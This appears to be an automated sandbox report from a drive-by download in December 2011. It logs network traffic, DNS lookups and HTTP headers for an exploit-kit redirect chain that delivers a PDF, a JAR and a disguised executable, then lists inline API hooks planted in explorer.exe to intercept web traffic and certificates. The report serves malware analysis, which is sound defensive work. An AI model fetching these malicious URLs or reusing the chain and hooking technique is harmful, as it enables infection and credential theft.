Dec 8, 2011 14:53:39.453943968 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455208063 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455569983 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.455580950 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455728054 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455794096 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.455806017 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455883026 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.456090927 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.456185102 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.456192970 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.456423998 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.481204987 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.481211901 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.481688976 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.613133907 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.613146067 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.832456112 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:41.111985922 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:41.112004995 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:42.275878906 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:42.456238031 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:49.635596037 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:49.635706902 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:49.635874987 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.050669909 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.050698042 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:57.050935984 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.069785118 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.069801092 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:58.200525045 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:58.313512087 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:59.575965881 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:59.575979948 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:54:04.407459021 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:54:04.544128895 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:54:06.202682972 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:54:33.051043034 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:54:33.051429987 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:54:40.112162113 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:55:06.918129921 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:55:06.918376923 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:55:08.969717026 CET 1066 80 192.168.0.13 46.45.137.206
+ All UDP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 8, 2011 14:52:25.491370916 CET 50633 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:25.797595024 CET 53 50633 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:41.369018078 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:42.360913038 CET 52223 53 192.168.0.13 195.186.4.121
Dec 8, 2011 14:52:43.360970974 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:45.360104084 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:45.360378981 CET 52223 53 192.168.0.13 195.186.4.121
Dec 8, 2011 14:52:49.359268904 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:49.359544039 CET 52223 53 192.168.0.13 195.186.4.121
Dec 8, 2011 14:52:53.406585932 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:54.775715113 CET 53 52223 195.186.4.121 192.168.0.13
Dec 8, 2011 14:52:57.528232098 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:57.721203089 CET 53 52223 195.186.4.121 192.168.0.13
Dec 8, 2011 14:52:57.978863955 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:58.232969046 CET 53027 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:59.231983900 CET 53027 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:59.775213957 CET 53 53027 195.186.1.121 192.168.0.13
Dec 8, 2011 14:53:00.058979988 CET 53 53027 195.186.1.121 192.168.0.13
Dec 8, 2011 14:53:00.835930109 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:53:01.030433893 CET 53 52223 195.186.4.121 192.168.0.13
Dec 8, 2011 14:53:01.664146900 CET 54387 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:53:02.218905926 CET 53 54387 195.186.1.121 192.168.0.13
Dec 8, 2011 14:54:52.217982054 CET 22811 20114 192.168.0.13 79.14.160.118
Dec 8, 2011 14:55:07.211968899 CET 22811 21834 192.168.0.13 125.27.159.156
Dec 8, 2011 14:55:22.206707954 CET 22811 21698 192.168.0.13 78.14.232.12
+ All ICMP
Timestamp Source IP Dest IP Checksum Code Type
Dec 8, 2011 14:52:54.776134968 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.528696060 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.721584082 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.979291916 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:00.059492111 CET 192.168.0.13 195.186.1.121 833b (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:00.836359024 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:01.030864000 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
+ DNS Query
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Dec 8, 2011 14:52:25.491370916 CET 192.168.0.13 195.186.1.121 0xa3cb Standard query (0) firedepartment.mobi A (IP address) IN (0x0001)
Dec 8, 2011 14:52:41.369018078 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:42.360913038 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:43.360970974 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:45.360104084 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:45.360378981 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:49.359268904 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:49.359544039 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:58.232969046 CET 192.168.0.13 195.186.1.121 0xd3d0 Standard query (0) southfloridazulunation.com A (IP address) IN (0x0001)
Dec 8, 2011 14:52:59.231983900 CET 192.168.0.13 195.186.1.121 0xd3d0 Standard query (0) southfloridazulunation.com A (IP address) IN (0x0001)
Dec 8, 2011 14:53:01.664146900 CET 192.168.0.13 195.186.1.121 0x275f Standard query (0) combijump.com A (IP address) IN (0x0001)
+ DNS Answer
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class
Dec 8, 2011 14:52:25.797595024 CET 195.186.1.121 192.168.0.13 0xa3cb No error (0) firedepartment.mobi 174.121.93.116 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:53.406585932 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:54.775715113 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.528232098 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.721203089 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.978863955 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:59.775213957 CET 195.186.1.121 192.168.0.13 0xd3d0 No error (0) southfloridazulunation.com 97.74.215.96 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:00.058979988 CET 195.186.1.121 192.168.0.13 0xd3d0 No error (0) southfloridazulunation.com 97.74.215.96 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:00.835930109 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:01.030433893 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:02.218905926 CET 195.186.1.121 192.168.0.13 0x275f No error (0) combijump.com 46.45.137.206 A (IP address) IN (0x0001)
+ HTTP
Timestamp Source Port Dest Port Source IP Dest IP Header
Dec 8, 2011 14:52:25.828499079 CET 1060 80 192.168.0.13 174.121.93.116 GET /f3429b/index.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: firedepartment.mobi
Connection: Keep-Alive
Dec 8, 2011 14:52:41.196527958 CET 80 1060 174.121.93.116 192.168.0.13 HTTP/1.1 200 OK
Date: Thu, 08 Dec 2011 14:01:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 08 Dec 2011 07:46:58 GMT
ETag: "14a3866c-1eb-4b38fdf7c4080"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 209
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Dec 8, 2011 14:52:53.480904102 CET 1061 80 192.168.0.13 188.40.51.83 GET /ajaxam.js HTTP/1.1
Accept: */*
Referer: http://firedepartment.mobi/f3429b/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: zespolpickup.pl
Connection: Keep-Alive
Dec 8, 2011 14:52:58.175259113 CET 80 1061 188.40.51.83 192.168.0.13 HTTP/1.1 404 Not Found
Date: Thu, 08 Dec 2011 14:02:14 GMT
Server: Power MOD by linuxpl.com
Content-Length: 409
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Dec 8, 2011 14:52:59.798469067 CET 1062 80 192.168.0.13 97.74.215.96 GET /ajaxam.js HTTP/1.1
Accept: */*
Referer: http://firedepartment.mobi/f3429b/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: southfloridazulunation.com
Connection: Keep-Alive
Dec 8, 2011 14:53:01.639601946 CET 80 1062 97.74.215.96 192.168.0.13 HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 07 Dec 2011 20:58:11 GMT
Accept-Ranges: bytes
ETag: "8574aee22b5cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 08 Dec 2011 14:02:20 GMT
Content-Length: 72
Dec 8, 2011 14:53:02.240076065 CET 1063 80 192.168.0.13 46.45.137.206 GET /main.php?page=abfd0d069b45c17e HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:53:12.882401943 CET 80 1063 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:03:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Dec 8, 2011 14:53:25.272623062 CET 1063 80 192.168.0.13 46.45.137.206 GET /content/fdp2.php?f=41::4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://combijump.com/main.php?page=abfd0d069b45c17e
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:53:26.495893002 CET 1064 80 192.168.0.13 46.45.137.206 GET /content/g43kb6j34kblq6jh34kb6j3kl4.jar HTTP/1.1
accept-encoding: pack200-gzip,gzip
content-type: application/x-java-archive
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.5.0_01
Host: combijump.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Dec 8, 2011 14:53:28.364690065 CET 80 1063 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:03:52 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Accept-Ranges: bytes
Content-Length: 118094
Content-Disposition: inline; filename=c451a.pdf
Dec 8, 2011 14:53:32.170098066 CET 80 1064 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:03:58 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 5861
Last-Modified: Wed, 07 Dec 2011 08:42:54 GMT
Accept-Ranges: bytes
Dec 8, 2011 14:53:35.919351101 CET 1064 80 192.168.0.13 46.45.137.206 GET /w.php?f=41&e=1 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.5.0_01
Host: combijump.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Dec 8, 2011 14:53:36.869817972 CET 80 1064 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Pragma: public
Expires: Thu, 08 Dec 2011 14:11:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 257536
Dec 8, 2011 14:53:41.111985922 CET 1064 80 192.168.0.13 46.45.137.206 GET /w.php?f=4&e=1 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.5.0_01
Host: combijump.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Dec 8, 2011 14:53:42.275878906 CET 80 1064 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Dec 8, 2011 14:53:57.069785118 CET 1066 80 192.168.0.13 46.45.137.206 GET /w.php?f=41&e=4 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:53:58.200525045 CET 80 1066 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Dec 8, 2011 14:53:59.575965881 CET 1066 80 192.168.0.13 46.45.137.206 GET /w.php?f=4&e=4 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:54:04.407459021 CET 80 1066 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Hooks
+ User Modules
+ Hook Summary
Function Name Hook Type Active in Processes
GetUpdateRect INLINE explorer.exe, wscntfy.exe, ctfmon.exe
CallWindowProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
CallWindowProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
EndPaint INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetUpdateRgn INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetDCEx INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetCapture INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefWindowProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetMessageA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetMessageW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefDlgProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetDC INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefDlgProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefWindowProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetClipboardData INLINE explorer.exe, wscntfy.exe, ctfmon.exe
OpenInputDesktop INLINE explorer.exe, wscntfy.exe, ctfmon.exe
PeekMessageA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
PeekMessageW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetWindowDC INLINE explorer.exe, wscntfy.exe, ctfmon.exe
ReleaseDC INLINE explorer.exe, wscntfy.exe, ctfmon.exe
SetCapture INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefMDIChildProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefMDIChildProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefFrameProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefFrameProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassExW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
TranslateMessage INLINE explorer.exe, wscntfy.exe, ctfmon.exe
BeginPaint INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassExA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetCursorPos INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetMessagePos INLINE explorer.exe, wscntfy.exe, ctfmon.exe
SwitchDesktop INLINE explorer.exe, wscntfy.exe, ctfmon.exe
SetCursorPos INLINE explorer.exe, wscntfy.exe, ctfmon.exe
ReleaseCapture INLINE explorer.exe, wscntfy.exe, ctfmon.exe
ZwCreateThread INLINE explorer.exe, wscntfy.exe, ctfmon.exe
LdrLoadDll INLINE explorer.exe, wscntfy.exe, ctfmon.exe
NtCreateThread INLINE explorer.exe, wscntfy.exe, ctfmon.exe
InternetReadFile INLINE explorer.exe
HttpSendRequestA INLINE explorer.exe
HttpSendRequestW INLINE explorer.exe
InternetSetStatusCallbackW INLINE explorer.exe
InternetSetStatusCallbackA INLINE explorer.exe
InternetQueryDataAvailable INLINE explorer.exe
InternetReadFileExA INLINE explorer.exe
InternetSetStatusCallback INLINE explorer.exe
HttpSendRequestExA INLINE explorer.exe
HttpQueryInfoA INLINE explorer.exe
InternetSetOptionA INLINE explorer.exe
HttpSendRequestExW INLINE explorer.exe
InternetCloseHandle INLINE explorer.exe
closesocket INLINE explorer.exe
WSARecv INLINE explorer.exe
send INLINE explorer.exe
recv INLINE explorer.exe
WSASend INLINE explorer.exe
PFXImportCertStore INLINE explorer.exe
+ Processes
+ Process: explorer.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x94 0x47 0x7E 0xE5 0x50
CallWindowProcA INLINE 0xE9 0x9B 0xB9 0x9F 0xF3 0x30
CallWindowProcW INLINE 0xE9 0x9C 0xCF 0xFF 0xFC 0xC0
EndPaint INLINE 0xE9 0x9B 0xBA 0xAF 0xFC 0xC0
GetUpdateRgn INLINE 0xE9 0x9B 0xB7 0x79 0x98 0x80
GetDCEx INLINE 0xE9 0x96 0x62 0x2C 0xC7 0x70
GetCapture INLINE 0xE9 0x9D 0xD2 0x2A 0xA7 0x70
DefWindowProcW INLINE 0xE9 0x99 0x97 0x70 0x0D 0xD0
GetMessageA INLINE 0xE9 0x94 0x48 0x8C 0xC6 0x60
GetMessageW INLINE 0xE9 0x98 0x85 0x5A 0xAB 0xB0
DefDlgProcA INLINE 0xE9 0x91 0x12 0x2B 0xB6 0x60
GetDC INLINE 0xE9 0x98 0x8B 0xB0 0x06 0x60
DefDlgProcW INLINE 0xE9 0x90 0x09 0x95 0x5E 0xE0
DefWindowProcA INLINE 0xE9 0x97 0x7F 0xFD 0xD9 0x90
GetClipboardData INLINE 0xE9 0x9E 0xE4 0x43 0x35 0x50
OpenInputDesktop INLINE 0xE9 0x9A 0xA6 0x6A 0xAD 0xD0
PeekMessageA INLINE 0xE9 0x98 0x86 0x69 0x9A 0xA0
PeekMessageW INLINE 0xE9 0x90 0x00 0x0A 0xAB 0xB0
RegisterClassW INLINE 0xE9 0x92 0x21 0x1F 0xFA 0xA0
RegisterClassA INLINE 0xE9 0x9A 0xAA 0xAB 0xB3 0x30
GetWindowDC INLINE 0xE9 0x97 0x70 0x0F 0xFD 0xD0
ReleaseDC INLINE 0xE9 0x93 0x33 0x30 0x07 0x70
SetCapture INLINE 0xE9 0x9A 0xA4 0x47 0x78 0x80
DefMDIChildProcA INLINE 0xE9 0x9F 0xF3 0x3A 0xA2 0x20
DefMDIChildProcW INLINE 0xE9 0x91 0x1A 0xA9 0x92 0x20
DefFrameProcA INLINE 0xE9 0x9B 0xB3 0x3A 0xA2 0x20
DefFrameProcW INLINE 0xE9 0x99 0x9C 0xC9 0x93 0x30
RegisterClassExW INLINE 0xE9 0x9D 0xD6 0x6E 0xEE 0xE0
TranslateMessage INLINE 0xE9 0x93 0x3F 0xFB 0xB6 0x60
BeginPaint INLINE 0xE9 0x95 0x5E 0xEF 0xFC 0xC0
RegisterClassExA INLINE 0xE9 0x96 0x6E 0xE2 0x22 0x20
GetCursorPos INLINE 0xE9 0x93 0x30 0x0A 0xA4 0x40
GetMessagePos INLINE 0xE9 0x9E 0xE0 0x0A 0xA1 0x10
SwitchDesktop INLINE 0xE9 0x92 0x2B 0xB9 0x9C 0xC0
SetCursorPos INLINE 0xE9 0x91 0x12 0x2D 0xDA 0xA0
ReleaseCapture INLINE 0xE9 0x9E 0xE2 0x27 0x78 0x80
+ Process: explorer.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xEB
LdrLoadDll INLINE 0xE9 0x90 0x09 0x91 0x1F 0xFB
NtCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xEB
+ Process: explorer.exe, Module: WININET.dll
Function Name Hook Type New Data
InternetReadFile INLINE 0xE9 0x90 0x0A 0xAF 0xFA 0xA2
HttpSendRequestA INLINE 0xE9 0x96 0x6F 0xF1 0x1A 0xA2
HttpSendRequestW INLINE 0xE9 0x9F 0xFD 0xD4 0x4B 0xB2
InternetSetStatusCallbackW INLINE 0xE9 0x9B 0xB4 0x4E 0xE1 0x12
InternetSetStatusCallbackA INLINE 0xE9 0x9B 0xBB 0xBE 0xED 0xD2
InternetQueryDataAvailable INLINE 0xE9 0x98 0x8B 0xBF 0xF3 0x32
InternetReadFileExA INLINE 0xE9 0x93 0x34 0x4E 0xEC 0xC2
InternetSetStatusCallback INLINE 0xE9 0x9B 0xBB 0xBE 0xED 0xD2
HttpSendRequestExA INLINE 0xE9 0x94 0x4B 0xB4 0x4C 0xC2
HttpQueryInfoA INLINE 0xE9 0x9F 0xF0 0x00 0x03 0x32
InternetSetOptionA INLINE 0xE9 0x95 0x5F 0xFC 0xCC 0xC2
HttpSendRequestExW INLINE 0xE9 0x9A 0xA6 0x69 0x91 0x12
InternetCloseHandle INLINE 0xE9 0x92 0x25 0x52 0x2F 0xF2
+ Process: explorer.exe, Module: WS2_32.dll
Function Name Hook Type New Data
closesocket INLINE 0xE9 0x93 0x3E 0xEE 0xE9 0x99
WSARecv INLINE 0xE9 0x9F 0xFA 0xAD 0xDB 0xB9
send INLINE 0xE9 0x99 0x94 0x4D 0xDB 0xB9
recv INLINE 0xE9 0x9F 0xF8 0x8C 0xC0 0x09
WSASend INLINE 0xE9 0x9F 0xFB 0xBB 0xBE 0xE9
+ Process: explorer.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xE9 0x97 0x7A 0xA1 0x19 0x99
+ Process: wscntfy.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x94 0x47 0x7E 0xE5 0x56
CallWindowProcA INLINE 0xE9 0x9B 0xB9 0x9F 0xF3 0x36
CallWindowProcW INLINE 0xE9 0x9C 0xCF 0xFF 0xFC 0xC6
EndPaint INLINE 0xE9 0x9B 0xBA 0xAF 0xFC 0xC6
GetUpdateRgn INLINE 0xE9 0x9B 0xB7 0x79 0x98 0x86
GetDCEx INLINE 0xE9 0x96 0x62 0x2C 0xC7 0x76
GetCapture INLINE 0xE9 0x9D 0xD2 0x2A 0xA7 0x76
DefWindowProcW INLINE 0xE9 0x99 0x97 0x70 0x0D 0xD6
GetMessageA INLINE 0xE9 0x94 0x48 0x8C 0xC6 0x66
GetMessageW INLINE 0xE9 0x98 0x85 0x5A 0xAB 0xB6
DefDlgProcA INLINE 0xE9 0x91 0x12 0x2B 0xB6 0x66
GetDC INLINE 0xE9 0x98 0x8B 0xB0 0x06 0x66
DefDlgProcW INLINE 0xE9 0x90 0x09 0x95 0x5E 0xE6
DefWindowProcA INLINE 0xE9 0x97 0x7F 0xFD 0xD9 0x96
